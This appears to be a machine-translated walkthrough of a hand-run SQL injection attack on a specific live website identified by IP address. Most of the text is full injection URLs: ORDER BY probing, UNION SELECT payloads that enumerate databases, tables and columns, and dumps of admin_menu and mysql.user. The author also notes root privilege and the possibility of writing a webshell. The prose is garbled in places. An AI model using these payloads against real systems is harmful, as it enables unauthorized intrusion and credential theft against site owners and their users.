Hand-Injected Stick station

Injection point: http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109

Use order by to determine a field

Order BY 25 Error

Order by 23 Normal return

Order BY 24 Try

OK, order by 25 error, ORDER by 24 returns normally, the field is determined at 24.

Next, use the union package to query the database name password, and so on.

Use database () to view the names of the databases

Use version () to view the revision number

Use @ @datadir to view the path to the database

Use User () to view users

Use System_user () to see who the users of the current system are

Look at the current connected user using Current_User () query

Haha, come out, are it ah, MySQL also open remote login, it seems to have been to the day, by default will not use remote login.

See who the user is currently connected to Session_user ()

and Ord (User (), 1, 1) =114 See what permissions users are

OK, the page returned is different from the page where the error occurred, that is, root permission

This is good, as long as you know the absolute path can write a word in

First Use @ @version_compile_os to see what the operating system is

Check the INFORMATION_SCHEMA table to see what databases are available

http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat% 28distinct+table_schema%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20information_ schema.columns--

With so many databases, the next one is the name of the table,

http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat% 28distinct+table_name%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20information_schema.tables %20where%20table_schema=database%28%29--

Haha, straight enough, all the table names come out,

Database name, table names burst out, then the next thing to do is to explode the field,

http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat% 28distinct+column_name%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20information_ Schema.columns+where+table_name=0x61646d696e5f6d656e75

Note: 0x61646d696e5f6d656e75 is the hex of the admin_menu that exploded above

Using http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat% 28admin_id,0x2b,allow_menu%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20admin_menu

Burst this information, flat is not the administrator's account password

But the method is the same,

and 1=2 Union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from Mysql.user

http://203.246.61.24/ipsi/sub05/sub09_a.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,@ @version_ Compile_os,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20mysql.user

Hand-Injected Stick station